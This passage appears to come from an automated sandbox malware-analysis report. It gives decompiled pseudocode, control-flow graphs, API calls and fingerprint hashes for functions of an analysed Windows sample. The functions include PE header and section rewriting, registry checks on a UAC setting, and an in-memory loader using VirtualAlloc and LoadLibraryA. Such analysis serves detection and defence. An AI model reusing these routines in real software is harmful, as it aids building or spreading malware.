                                                                                0x00407212
                                                                                0x0040721b
                                                                                0x00407221
                                                                                0x00407224
                                                                                0x00000000
                                                                                0x00407224
                                                                                0x0040713d
                                                                                0x00407142
                                                                                0x00407143
                                                                                0x00407145
                                                                                0x0040715e
                                                                                0x00407166
                                                                                0x0040716b
                                                                                0x00000000
                                                                                0x0040716b
                                                                                0x0040714b
                                                                                0x00407154
                                                                                0x0040715a
                                                                                0x0040715c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040715c
                                                                                0x004071b2
                                                                                0x00000000
                                                                                0x004071b2

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000101,74CB43E0,?,74CB43E0,00000000), ref: 004070C2
                                                                                • RegEnumValueA.KERNELBASE(74CB43E0,00000000,?,00000020,00000000,00000000,00000000,0000012C,?,74CB43E0,00000000), ref: 0040719E
                                                                                • RegCloseKey.KERNELBASE(74CB43E0,?,74CB43E0,00000000), ref: 004071B2
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00407208
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00407291
                                                                                • ___ascii_stricmp.LIBCMT ref: 004072C2
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 004072D0
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00407314
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 004073D8
                                                                                  • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                • String ID: $"$PromptOnSecureDesktop
                                                                                • API String ID: 4293430545-98143240
                                                                                • Opcode ID: df9fb8698735da703c9513efeb9e5005b2c7850a4ce7d3985355b06bc3c585b2
                                                                                • Instruction ID: 42610d5d4912e138811464987e42a56107d9bf2f6382ea6b9d81aa24fc4965e2
                                                                                • Opcode Fuzzy Hash: df9fb8698735da703c9513efeb9e5005b2c7850a4ce7d3985355b06bc3c585b2
                                                                                • Instruction Fuzzy Hash: B5B17071D08209BAEB159FA1DC45BEF77B8AB04304F20047BF501F61D1EB79AA94CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040675C Relevance: 19.7, APIs: 13, Instructions: 199fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 576 40675c-406778 577 406784-4067a2 CreateFileA 576->577 578 40677a-40677e SetFileAttributesA 576->578 579 4067a4-4067b2 CreateFileA 577->579 580 4067b5-4067b8 577->580 578->577 579->580 581 4067c5-4067c9 580->581 582 4067ba-4067bf SetFileAttributesA 580->582 583 406977-406986 581->583 584 4067cf-4067df GetFileSize 581->584 582->581 585 4067e5-4067e7 584->585 586 40696b 584->586 585->586 588 4067ed-40680b ReadFile 585->588 587 40696e-406971 FindCloseChangeNotification 586->587 587->583 588->586 589 406811-406824 SetFilePointer 588->589 589->586 590 40682a-406842 ReadFile 589->590 590->586 591 406848-406861 SetFilePointer 590->591 591->586 592 406867-406876 591->592 593 4068d5-4068df 592->593 594 406878-40688f ReadFile 592->594 593->587 595 4068e5-4068eb 593->595 596 406891-40689e 594->596 597 4068d2 594->597 598 4068f0-4068fe call 40ebcc 595->598 599 4068ed 595->599 600 4068a0-4068b5 596->600 601 4068b7-4068ba 596->601 597->593 598->586 608 406900-40690b SetFilePointer 598->608 599->598 602 4068bd-4068c3 600->602 601->602 604 4068c5 602->604 605 4068c8-4068ce 602->605 604->605 605->594 607 4068d0 605->607 607->593 609 40695a-406969 call 40ec2e 608->609 610 40690d-406920 ReadFile 608->610 609->587 610->609 611 406922-406958 610->611 611->587
                                                                                C-Code - Quality: 100%
                                                                                			E0040675C(CHAR* _a4, long* _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				struct _OVERLAPPED* _v24;
				long _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				void _v68;
				long _v72;
				void _v132;
				intOrPtr _v320;
				signed int _v360;
				signed int _v374;
				void _v380;
				void* _t85;
				long _t88;
				int _t92;
				long _t93;
				int _t96;
				long _t99;
				long _t102;
				struct _OVERLAPPED* _t103;
				long _t104;
				long _t115;
				long _t120;
				signed int _t143;
				void* _t146;

				_v16 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 0x80);
				}
				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_v12 = _t85;
				if(_t85 == 0xffffffff) {
					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
				}
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 2);
				}
				if(_v12 != 0xffffffff) {
					_t88 = GetFileSize(_v12, 0);
					_v8 = _t88;
					if(_t88 == 0xffffffff || _t88 == 0) {
						L31:
						_v8 = 0;
					} else {
						_a12 = 0;
						_v28 = 0;
						_t92 = ReadFile(_v12,  &_v132, 0x40,  &_a12, 0); // executed
						if(_t92 == 0) {
							goto L31;
						} else {
							_t93 = SetFilePointer(_v12, _v72, 0, 0); // executed
							if(_t93 == 0xffffffff) {
								goto L31;
							} else {
								_t96 = ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0); // executed
								if(_t96 == 0) {
									goto L31;
								} else {
									_t99 = SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0); // executed
									if(_t99 == 0xffffffff) {
										goto L31;
									} else {
										_v20 = 0;
										_v24 = 0;
										if(0 < _v374) {
											while(1) {
												_t115 = 0x28;
												_a12 = _t115;
												if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
													break;
												}
												_t143 = _v374 & 0x0000ffff;
												if(_v24 != _t143 - 1) {
													_t120 = _v48 + _v52;
												} else {
													_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
												}
												_a12 = _t120;
												if(_v20 < _t120) {
													_v20 = _t120;
												}
												_v24 = _v24 + 1;
												if(_v24 < _t143) {
													continue;
												} else {
												}
												goto L23;
											}
											_v8 = 0;
										}
										L23:
										if(_v24 >= (_v374 & 0x0000ffff)) {
											_t102 = _v20;
											if(_v8 > _t102) {
												_v8 = _t102;
											}
											_t103 = E0040EBCC(_v8);
											_v16 = _t103;
											if(_t103 == 0) {
												goto L31;
											} else {
												_t104 = SetFilePointer(_v12, 0, 0, 0); // executed
												if(_t104 == 0xffffffff) {
													L30:
													_v8 = 0;
													E0040EC2E(_v16);
													_v16 = 0;
												} else {
													_t146 = _v16;
													if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
														goto L30;
													} else {
														 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
														_v8 = _v20;
													}
												}
											}
										}
									}
								}
							}
						}
					}
					FindCloseChangeNotification(_v12); // executed
				}
				 *_a8 = _v8;
				return _v16;
			}
































                                                                                0x0040676a
                                                                                0x0040676d
                                                                                0x00406778
                                                                                0x0040677e
                                                                                0x0040677e
                                                                                0x0040679a
                                                                                0x0040679c
                                                                                0x004067a2
                                                                                0x004067b2
                                                                                0x004067b2
                                                                                0x004067b8
                                                                                0x004067bf
                                                                                0x004067bf
                                                                                0x004067c9
                                                                                0x004067d3
                                                                                0x004067d9
                                                                                0x004067df
                                                                                0x0040696b
                                                                                0x0040696b
                                                                                0x004067ed
                                                                                0x00406801
                                                                                0x00406804
                                                                                0x00406807
                                                                                0x0040680b
                                                                                0x00000000
                                                                                0x00406811
                                                                                0x0040681f
                                                                                0x00406824
                                                                                0x00000000
                                                                                0x0040682a
                                                                                0x0040683e
                                                                                0x00406842
                                                                                0x00000000
                                                                                0x00406848
                                                                                0x0040685c
                                                                                0x00406861
                                                                                0x00000000
                                                                                0x00406867
                                                                                0x00406869
                                                                                0x0040686c
                                                                                0x00406876
                                                                                0x00406878
                                                                                0x0040687a
                                                                                0x00406881
                                                                                0x0040688f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406891
                                                                                0x0040689e
                                                                                0x004068ba
                                                                                0x004068a0
                                                                                0x004068b2
                                                                                0x004068b2
                                                                                0x004068bd
                                                                                0x004068c3
                                                                                0x004068c5
                                                                                0x004068c5
                                                                                0x004068c8
                                                                                0x004068ce
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004068d0
                                                                                0x00000000
                                                                                0x004068ce
                                                                                0x004068d2
                                                                                0x004068d2
                                                                                0x004068d5
                                                                                0x004068df
                                                                                0x004068e5
                                                                                0x004068eb
                                                                                0x004068ed
                                                                                0x004068ed
                                                                                0x004068f3
                                                                                0x004068f9
                                                                                0x004068fe
                                                                                0x00000000
                                                                                0x00406900
                                                                                0x00406906
                                                                                0x0040690b
                                                                                0x0040695a
                                                                                0x0040695d
                                                                                0x00406960
                                                                                0x00406966
                                                                                0x0040690d
                                                                                0x0040690d
                                                                                0x00406920
                                                                                0x00000000
                                                                                0x00406922
                                                                                0x0040694f
                                                                                0x00406955
                                                                                0x00406955
                                                                                0x00406920
                                                                                0x0040690b
                                                                                0x004068fe
                                                                                0x004068df
                                                                                0x00406861
                                                                                0x00406842
                                                                                0x00406824
                                                                                0x0040680b
                                                                                0x00406971
                                                                                0x00406971
                                                                                0x0040697f
                                                                                0x00406986

                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,74CB43E0,00000000), ref: 0040677E
                                                                                • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,74CB43E0,00000000), ref: 0040679A
                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,74CB43E0,00000000), ref: 004067B0
                                                                                • SetFileAttributesA.KERNEL32(?,00000002,?,74CB43E0,00000000), ref: 004067BF
                                                                                • GetFileSize.KERNEL32(000000FF,00000000,?,74CB43E0,00000000), ref: 004067D3
                                                                                • ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,74CB43E0,00000000), ref: 00406807
                                                                                • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040681F
                                                                                • ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,74CB43E0,00000000), ref: 0040683E
                                                                                • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040685C
                                                                                • ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,74CB43E0,00000000), ref: 0040688B
                                                                                • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000,?,74CB43E0,00000000), ref: 00406906
                                                                                • ReadFile.KERNEL32(000000FF,004121A8,00000000,00408244,00000000,?,74CB43E0,00000000), ref: 0040691C
                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF,?,74CB43E0,00000000), ref: 00406971
                                                                                  • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                  • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
                                                                                • String ID:
                                                                                • API String ID: 1400801100-0
                                                                                • Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                • Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
                                                                                • Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                • Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 640 208003c-2080047 641 2080049 640->641 642 208004c-2080263 call 2080a3f call 2080e0f call 2080d90 VirtualAlloc 640->642 641->642 657 208028b-2080292 642->657 658 2080265-2080289 call 2080a69 642->658 659 20802a1-20802b0 657->659 662 20802ce-20803c2 VirtualProtect call 2080cce call 2080ce7 658->662 659->662 663 20802b2-20802cc 659->663 669 20803d1-20803e0 662->669 663->659 670 2080439-20804b8 VirtualFree 669->670 671 20803e2-2080437 call 2080ce7 669->671 672 20804be-20804cd 670->672 673 20805f4-20805fe 670->673 671->669 675 20804d3-20804dd 672->675 676 208077f-2080789 673->676 677 2080604-208060d 673->677 675->673 681 20804e3-2080505 LoadLibraryA 675->681 679 208078b-20807a3 676->679 680 20807a6-20807b0 676->680 677->676 682 2080613-2080637 677->682 679->680 684 208086e-20808be LoadLibraryA 680->684 685 20807b6-20807cb 680->685 686 2080517-2080520 681->686 687 2080507-2080515 681->687 688 208063e-2080648 682->688 692 20808c7-20808f9 684->692 689 20807d2-20807d5 685->689 690 2080526-2080547 686->690 687->690 688->676 691 208064e-208065a 688->691 693 2080824-2080833 689->693 694 20807d7-20807e0 689->694 695 208054d-2080550 690->695 691->676 696 2080660-208066a 691->696 697 20808fb-2080901 692->697 698 2080902-208091d 692->698 704 2080839-208083c 693->704 699 20807e2 694->699 700 20807e4-2080822 694->700 701 20805e0-20805ef 695->701 702 2080556-208056b 695->702 703 208067a-2080689 696->703 697->698 699->693 700->689 701->675 705 208056d 702->705 706 208056f-208057a 702->706 707 208068f-20806b2 703->707 708 2080750-208077a 703->708 704->684 709 208083e-2080847 704->709 705->701 711 208059b-20805bb 706->711 712 208057c-2080599 706->712 713 20806ef-20806fc 707->713 714 20806b4-20806ed 707->714 708->688 715 2080849 709->715 716 208084b-208086c 709->716 723 20805bd-20805db 711->723 712->723 717 208074b 713->717 718 20806fe-2080748 713->718 714->713 715->684 716->704 717->703 718->717 723->695
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0208024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: 094ada9956a38843da231dd86c67634bf040858582ffe9a2bc1163de5be843d6
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: 7D527A75A01229DFDBA4CF58C984BADBBB1BF09304F1480D9E54DAB351DB30AA89DF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004099D2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54stringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 46%
                                                                                			E004099D2(int __edx, void* __eflags, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, int _a20) {
				signed int _t14;
				void* _t21;
				CHAR* _t22;
				void* _t24;
				int _t25;

				_t25 = __edx;
				_t22 = _a8;
				lstrcpyA(_t22, _a4);
				E00408274(_t22);
				_push(0);
				_push(_a12);
				_t14 = E00406C6F((E0040ECA5() & 0x0000000f) << 0x00000014 | 0x00006104);
				_pop(_t24);
				_push(_t14 ^ 0x61616161);
				E0040F133();
				lstrcatA(_a12, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
				E0040EE2A(_t24, 0x4122f8, 0, 0x100);
				lstrcatA(_t22, _a12);
				_t21 = E00406A60(_t25, _t22, _a16, _a20); // executed
				return _t21;
			}








                                                                                0x004099d2
                                                                                0x004099d6
                                                                                0x004099df
                                                                                0x004099e6
                                                                                0x004099ec
                                                                                0x004099ee
                                                                                0x00409a02
                                                                                0x00409a07
                                                                                0x00409a0d
                                                                                0x00409a0e
                                                                                0x00409a3c
                                                                                0x00409a46
                                                                                0x00409a52
                                                                                0x00409a5b
                                                                                0x00409a67

                                                                                APIs
                                                                                • lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                • lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                • lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                  • Part of subcall function 00406A60: CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,74CF81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                  • Part of subcall function 00406A60: GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                  • Part of subcall function 00406A60: GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                  • Part of subcall function 00406A60: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                  • Part of subcall function 00406A60: DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Filelstrcat$CloseCreateDeleteDiskErrorFreeHandleLastSpacelstrcpy
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 4131120076-2980165447
                                                                                • Opcode ID: d80e02e7f2340feb2838cd3820060c46ea291b30a9194021c2dcc5ff6a6d6240
                                                                                • Instruction ID: 4ed420c39325858c4d47b9b9ee3d8ab97b09bc1ac19655b46481edbef4575242
                                                                                • Opcode Fuzzy Hash: d80e02e7f2340feb2838cd3820060c46ea291b30a9194021c2dcc5ff6a6d6240
                                                                                • Instruction Fuzzy Hash: 25018F7294020877EA106F62AC47F9F3E1DEB44718F04883AF619790D2D9BA94709A6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35sleepfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 739 404000-404008 740 40400b-40402a CreateFileA 739->740 741 404057 740->741 742 40402c-404035 GetLastError 740->742 743 404059-40405c 741->743 744 404052 742->744 745 404037-40403a 742->745 746 404054-404056 743->746 744->746 745->744 747 40403c-40403f 745->747 747->743 748 404041-404050 Sleep 747->748 748->740 748->744
                                                                                C-Code - Quality: 100%
                                                                                			E00404000(CHAR* _a4, signed int* _a8) {
				void* _t3;
				long _t6;
				void* _t8;
				signed int* _t9;

				_t9 = _a8;
				_t8 = 0;
				 *_t9 =  *_t9 | 0xffffffff;
				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
					if(_t3 != 0xffffffff) {
						break;
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) {
						L6:
						return 0;
					} else {
						if(_t6 == 5) {
							L9:
							return 1;
						}
						Sleep(0x1f4);
						_t8 = _t8 + 1;
						if(_t8 < 0xa) {
							continue;
						}
						goto L6;
					}
				}
				 *_t9 = _t3;
				goto L9;
			}







                                                                                0x00404001
                                                                                0x00404006
                                                                                0x00404008
                                                                                0x0040400b
                                                                                0x00404021
                                                                                0x0040402a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040402c
                                                                                0x00404035
                                                                                0x00404052
                                                                                0x00000000
                                                                                0x0040403c
                                                                                0x0040403f
                                                                                0x00404059
                                                                                0x00000000
                                                                                0x0040405b
                                                                                0x00404046
                                                                                0x0040404c
                                                                                0x00404050
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404050
                                                                                0x00404035
                                                                                0x00404057
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,PromptOnSecureDesktop,004042B6,00000000,00000001,PromptOnSecureDesktop,00000000,?,004098FD), ref: 00404021
                                                                                • GetLastError.KERNEL32(?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 0040402C
                                                                                • Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404046
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateErrorFileLastSleep
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 408151869-2980165447
                                                                                • Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                • Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
                                                                                • Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                • Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406987 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 749 406987-4069b7 750 4069e0 749->750 751 4069b9-4069be 749->751 753 4069e4-4069fd WriteFile 750->753 751->750 752 4069c0-4069d0 751->752 754 4069d2 752->754 755 4069d5-4069de 752->755 756 406a4d-406a51 753->756 757 4069ff-406a02 753->757 754->755 755->753 759 406a53-406a56 756->759 760 406a59 756->760 757->756 758 406a04-406a08 757->758 762 406a0a-406a0d 758->762 763 406a3c-406a3e 758->763 759->760 761 406a5b-406a5f 760->761 764 406a10-406a2e WriteFile 762->764 763->761 765 406a40-406a4b 764->765 766 406a30-406a33 764->766 765->761 766->765 767 406a35-406a3a 766->767 767->763 767->764
                                                                                C-Code - Quality: 97%
                                                                                			E00406987(void* __ecx, void* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
				long _v8;
				long _v12;
				signed int _t50;
				int _t52;
				signed int _t53;
				int _t59;
				signed int _t60;
				long _t68;
				signed int _t74;
				void* _t78;
				void* _t85;

				_t78 = _a8;
				_t48 =  *((intOrPtr*)(_t78 + 0x3c)) + _t78;
				_t7 =  &_a16; // 0x406b2c
				_t85 = (( *( *((intOrPtr*)(_t78 + 0x3c)) + _t78 + 6) & 0x0000ffff) - 1) * 0x28 + ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
				_t68 =  *(_t85 + 0x14);
				_t50 =  *_t7 - _t68;
				_v8 = _t50;
				if(_t68 >= _a12) {
					L5:
					_a16 = _a16 & 0x00000000;
				} else {
					_t74 =  *(_t85 + 0x10);
					if(_t74 == 0) {
						goto L5;
					} else {
						_v12 = _t74;
						_a16 = _t50 / _t74;
						if(_a16 < 1) {
							_a16 = 1;
						}
						_t20 =  &_a16; // 0x406b2c
						 *(_t85 + 0x10) =  *_t20 * _t74;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t52 = WriteFile(_a4, _t78, _t68,  &_v8, 0); // executed
				if(_t52 == 0 || _v8 != _t68) {
					if(_a16 != 0) {
						 *(_t85 + 0x10) = _v12;
					}
					_t53 = 0;
				} else {
					if(_a16 == 0) {
						L13:
						_t53 = _t68;
					} else {
						 *(_t85 + 0x10) = _v12;
						while(1) {
							_v8 = _v8 & 0x00000000;
							_t59 = WriteFile(_a4, _a8 +  *(_t85 + 0x14), _v12,  &_v8, 0); // executed
							_t60 = _v8;
							if(_t59 == 0 || _t60 != _v12) {
								break;
							}
							_t68 = _t68 + _t60;
							_t41 =  &_a16;
							 *_t41 = _a16 - 1;
							if( *_t41 != 0) {
								continue;
							} else {
								goto L13;
							}
							goto L18;
						}
						asm("sbb eax, eax");
						_t53 =  !_t60 & _t68 + _t60;
					}
				}
				L18:
				return _t53;
			}














                                                                                0x0040698f
                                                                                0x00406995
                                                                                0x004069a7
                                                                                0x004069aa
                                                                                0x004069ac
                                                                                0x004069af
                                                                                0x004069b1
                                                                                0x004069b7
                                                                                0x004069e0
                                                                                0x004069e0
                                                                                0x004069b9
                                                                                0x004069b9
                                                                                0x004069be
                                                                                0x00000000
                                                                                0x004069c0
                                                                                0x004069c4
                                                                                0x004069c7
                                                                                0x004069d0
                                                                                0x004069d2
                                                                                0x004069d2
                                                                                0x004069d5
                                                                                0x004069db
                                                                                0x004069db
                                                                                0x004069be
                                                                                0x004069e4
                                                                                0x004069f9
                                                                                0x004069fd
                                                                                0x00406a51
                                                                                0x00406a56
                                                                                0x00406a56
                                                                                0x00406a59
                                                                                0x00406a04
                                                                                0x00406a08
                                                                                0x00406a3c
                                                                                0x00406a3c
                                                                                0x00406a0a
                                                                                0x00406a0d
                                                                                0x00406a10
                                                                                0x00406a10
                                                                                0x00406a27
                                                                                0x00406a2b
                                                                                0x00406a2e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406a35
                                                                                0x00406a37
                                                                                0x00406a37
                                                                                0x00406a3a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406a3a
                                                                                0x00406a45
                                                                                0x00406a49
                                                                                0x00406a49
                                                                                0x00406a08
                                                                                0x00406a5b
                                                                                0x00406a5f

                                                                                APIs
                                                                                • WriteFile.KERNELBASE(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
                                                                                • WriteFile.KERNELBASE(00409A60,?,00409A60,00000000,00000000), ref: 00406A27
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID: ,k@
                                                                                • API String ID: 3934441357-1053005162
                                                                                • Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                • Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
                                                                                • Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                • Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406DC2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
